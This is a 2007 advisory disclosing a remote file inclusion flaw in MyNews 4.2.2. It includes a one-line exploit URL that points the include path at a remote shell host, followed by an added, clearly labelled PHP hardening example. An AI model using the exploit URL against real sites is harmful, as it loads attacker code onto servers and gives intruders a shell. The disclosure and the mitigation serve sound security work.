From: GolD_M <hacker__(at)_w.cn>
Date: 30.01.2007
Subject: MyNews 4.2.2 <= Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

MyNews 4.2.2 <=  Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by GolD_M(Mahmnood_ali)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL:
http://fresh.t-systems-sfr.com/unix/src/privat2/MyNews-4.2.2.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

V.CODE: In : /include/themes/themefunc.php  <<<<=====>>>>      Line : 2
require($myNewsConf['path']['sys']['index'] .  '/include/libs/modules.lib.php');

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:
http://www.hedef.com/[mynews_path]/include/themes/themefunc.php?myNewsConf[path][sys][index]=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
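
Added example, not part of the original advisory and not MyNews project code: one way to harden the require on line 2 of themefunc.php so that the include path can no longer be supplied by the request. It assumes the parameter reaches $myNewsConf through register_globals when the file is requested directly; MYNEWS_ENTRY and mynews_sys_root() are hypothetical names introduced for illustration.

```php
<?php
// Hardened replacement for line 2 of include/themes/themefunc.php.
// Added example, not MyNews project code. Server-side, also keep
// allow_url_include = Off and register_globals = Off in php.ini.

// Refuse direct requests. MYNEWS_ENTRY is a hypothetical constant that the
// application's entry script would define before including this file.
if (!defined('MYNEWS_ENTRY')) {
    header('HTTP/1.1 403 Forbidden');
    exit('Direct access not permitted');
}

/**
 * Return the directory the require is built from, accepting only a local
 * directory that really contains the expected library file.
 */
function mynews_sys_root($configured)
{
    // Fallback derived from this file's own location
    // (include/themes/ -> application root), independent of request data.
    $fallback = realpath(dirname(__FILE__) . '/../..');

    // Reject arrays and anything with a scheme or stream wrapper prefix
    // (http://, ftp://, php://, data:). Two or more characters before the
    // colon are required so a Windows drive letter is not misread as a scheme.
    if (!is_string($configured)
        || preg_match('#^[a-z][a-z0-9+.\-]+:#i', $configured)) {
        return $fallback;
    }

    // realpath() returns false for paths that do not exist locally.
    $real = realpath($configured);
    if ($real === false || !is_file($real . '/include/libs/modules.lib.php')) {
        return $fallback;
    }
    return $real;
}

$configured = isset($myNewsConf['path']['sys']['index'])
    ? $myNewsConf['path']['sys']['index']
    : null;

require mynews_sys_root($configured) . '/include/libs/modules.lib.php';
```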
